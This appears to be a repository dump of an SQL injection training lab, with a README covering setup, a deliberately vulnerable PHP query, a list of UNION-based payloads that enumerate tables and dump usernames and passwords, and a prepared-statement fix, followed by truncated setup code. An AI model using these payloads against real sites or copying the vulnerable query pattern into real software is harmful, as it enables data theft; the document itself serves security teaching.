--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# SQL Injection Training Lab

This is a simple SQL Injection lab. It needs very little storage and no special tools: an Apache server with PHP installed on your machine is enough to run the lab and practise SQL Injection.

SQL Injection (a.k.a. SQLi) is one of the most dangerous and most common cyber attacks. It usually starts with leaking data from the SQL database and can escalate to taking control of the server, changing or deleting data, or creating fake data.

This SQLi technique only works on SQL databases such as MySQL (including MariaDB), Oracle, Microsoft SQL Server and others. Even though NoSQL databases have risen in popularity and trust, SQL databases are still used across industry worldwide, which keeps the SQLi attack relevant until today.

Learning SQLi is easy and important, especially if you work as a programmer or developer: you need this knowledge to check whether the systems you build are secure or not.

# How to Install?
The installation of this lab is simple. You need an Apache server and PHP installed! If you are new to this, follow these steps:

## For Windows:
1. Install XAMPP (PHP 7.4 minimum)
2. Start your XAMPP Control Panel and click Start on Apache & MySQL
3. Go to "http://localhost/phpmyadmin"
4. Click on "New" in the top left menu
5. Insert the database name "sqli_lab"
6. Download this GitHub repo and extract it in "C:/xampp/htdocs"
7. Go to "http://localhost/SQL-Injection-Training-Lab"
8. Click on "Submit", then you are good to go

## For Linux
1. Install Apache `apt install apache2`
2. Install MySQL (search Google for the steps, which depend on your Linux distribution)
3. Install PHP `apt install php`
4. Install phpMyAdmin (optional) `apt install phpmyadmin`
5. Start Apache & MySQL `service apache2 start` & `service mysql start`
6. Log in to MySQL `sudo mysql -u root`
7. Create a new database named sqli_lab `CREATE DATABASE sqli_lab;`
8. Create a database user (optional)
```
CREATE USER 'sqli'@'localhost' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'sqli'@'localhost';
FLUSH PRIVILEGES;
```
(The SQL commands might differ depending on your MySQL version; the password is set by `CREATE USER`, since `GRANT ... IDENTIFIED BY` is no longer accepted by MySQL 8)

9. Go to "http://localhost/SQL-Injection-Training-Lab"
10. Insert your created database user "sqli" with password "password"
11. Click on "Submit", then you are good to go

## Notes
If you are using Kali Linux, you can start from step 6 of the Linux steps.

# Basic SQL Injection
SQLi happens when user input is not filtered/sanitized and is used directly in the SQL query. Example (in PHP):
```
$id = $_GET["id"];

// $id is concatenated into the query text without any validation or escaping
$sql = "SELECT * FROM users WHERE id = '$id'";
$query = mysqli_query($conn, $sql);
```
The variable `$id` stores the unfiltered/unsanitized value taken from `$_GET`. This means the `id` input can be used to break the SQL query inside the PHP code.

## What is a Payload?
A payload is the input used to manipulate the SQL query. The most common payload for checking whether a URL or site is open to SQLi is a single quote `'` or double quote `"` appended to the `id` parameter. Example:

http://unsecure-web.com/SQL-Injection-Training-Lab/index.php?id=1

Hackers append `'` or `"` like this:

http://unsecure-web.com/SQL-Injection-Training-Lab/index.php?id=1'

Or

http://unsecure-web.com/SQL-Injection-Training-Lab/index.php?id=1"

The `'` or `"` is used to terminate the string literal in the comparison inside the SQL query. Example:
```
//without quote(s)
...
$sql = "SELECT * FROM users WHERE id = '1'";

//with quote
...
$sql = "SELECT * FROM users WHERE id = '1''";
```
The code above shows that there is an additional `'` character after the input, which breaks the SQL query (the unbalanced quote is a syntax error). This means the `'` payload works for the current attack because the SQL query wraps the value in the same single quote as our payload.

The payload does not stop at the quote; it can be elaborated until we can insert a complete SQL query into the input. Here are a few examples of how the payload is elaborated:
```
...index.php?id=1'

//commenting out the rest of the SQL after the input
...index.php?id=1'--+

...index.php?id=1'+order+by+1--+
...index.php?id=1'+union+all+select+1,2,3,4,5--+
...index.php?id=-1'+union+all+select+1,2,3,4,5--+

//List all tables in the current database
...index.php?id=-1'+union+all+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--+

//List all columns in a specific table
...index.php?id=-1'+union+all+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_schema=database()+and+table_name='tbl_users'--+

//List all data in a specific table
...index.php?id=-1'+union+all+select+1,group_concat(username),group_concat(password),4,5+from+tbl_users--+
```
These are the basic payloads we can use to perform a SQLi attack. More payloads can be created depending on how strong your knowledge of SQL commands is.
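
The following is an added example, not part of the lab's own code: the vulnerable `id` lookup from the sections above next to a hardened version of the same query, so you can see why the quote probe breaks one and not the other. It assumes the `sqli`/`password` user from the install steps, a MySQL server on 127.0.0.1, a `users` table with an integer `id` column, and the mysqlnd driver (the XAMPP default) for `mysqli_stmt_get_result()`.

```php
<?php
// Added example (not the lab's own code): vulnerable vs. hardened lookup.
// Assumes a `users` table with an integer `id` column in sqli_lab and the
// mysqlnd driver, so that mysqli_stmt_get_result() exists.

mysqli_report(MYSQLI_REPORT_OFF); // return false on error instead of throwing (PHP 8.1+ default)

// Vulnerable: $id is pasted straight into the SQL text, so the value "1'"
// yields  WHERE id = '1''  and the parser reports a syntax error; any SQL
// inside $id is executed as part of the statement.
function lookup_user_vulnerable(mysqli $conn, string $id): ?array
{
    $sql = "SELECT * FROM users WHERE id = '$id'";
    $result = mysqli_query($conn, $sql);
    if ($result === false) {
        // Log, never echo: a verbose SQL error tells a probing client that
        // its quote reached the parser, which is exactly what the quote test looks for.
        error_log("users lookup failed: " . mysqli_error($conn));
        return null;
    }
    return mysqli_fetch_assoc($result) ?: null;
}

// Hardened: validate the shape first, then bind the value as a parameter.
// With a prepared statement the SQL text is fixed before the value is sent,
// so quotes, comments and UNIONs inside $id can only ever be data.
function lookup_user_safe(mysqli $conn, string $id): ?array
{
    if (filter_var($id, FILTER_VALIDATE_INT) === false) {
        return null; // "1'", "-1' union ..." and "" are all rejected here
    }
    $stmt = mysqli_prepare($conn, "SELECT * FROM users WHERE id = ?");
    if ($stmt === false) {
        return null;
    }
    $intId = (int) $id;
    mysqli_stmt_bind_param($stmt, "i", $intId);
    mysqli_stmt_execute($stmt);
    $result = mysqli_stmt_get_result($stmt);
    $row = $result ? mysqli_fetch_assoc($result) : null;
    mysqli_stmt_close($stmt);
    return $row ?: null;
}

// Usage: the same request parameter goes through both functions.
$conn = mysqli_connect("127.0.0.1", "sqli", "password", "sqli_lab");
$id = $_GET["id"] ?? "1";
var_dump(lookup_user_vulnerable($conn, $id));
var_dump(lookup_user_safe($conn, $id));
```

Request the script with `?id=1'` and only the first function reaches the database with the quote in place; the second rejects the value before any query is sent.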

# How to Learn from this Repo?
This repo was created for our MyOPECS (Malaysia Open Cyber Security) training. If you are Malaysian and can speak Malay, you can watch my videos on YouTube or follow our weekly hacking training every Thursday night, live on TikTok.

If you do not fit the criteria above, you can keep reading the README.md in every folder from Level A-N. (Will be updated from time to time.)

--------------------------------------------------------------------------------
/core/connection.php:
--------------------------------------------------------------------------------
404 Not Found");
}

if(file_exists(dirname(__DIR__) . "/configure.json")){
    $json = file_get_contents(dirname(__DIR__) . "/configure.json");
    $obj = json_decode($json);

    $conn = mysqli_connect($obj->host . ":" . $obj->port, $obj->username, $obj->password, "sqli_lab");

    if(!$conn){
        die("Fail connecting to your database. Please make sure your MySQL server is enabled and this training has been setup properly.");
    }
}else{
    header("Content-Type: text/plain");
    die("you need to setup the database of this training first.");
}

--------------------------------------------------------------------------------
/core/index.php:
--------------------------------------------------------------------------------
$_POST["host"],
    "port" => $_POST["port"],
    "username" => $_POST["username"],
    "password" => $_POST["password"]
];

$f = fopen(__DIR__ . "/configure.json", "w+");
fwrite($f, json_encode($config));
fclose($f);

$conn = mysqli_connect($config["host"] . ":" . $config["port"], $config["username"], $config["password"], "sqli_lab");

if($conn){
    mysqli_query($conn, <<

SQL Injection Training Lab

Welcome to SQL Injection Lab Training!

Completed! Your database information has been saved..

Completed! You can continue for practice..
93 |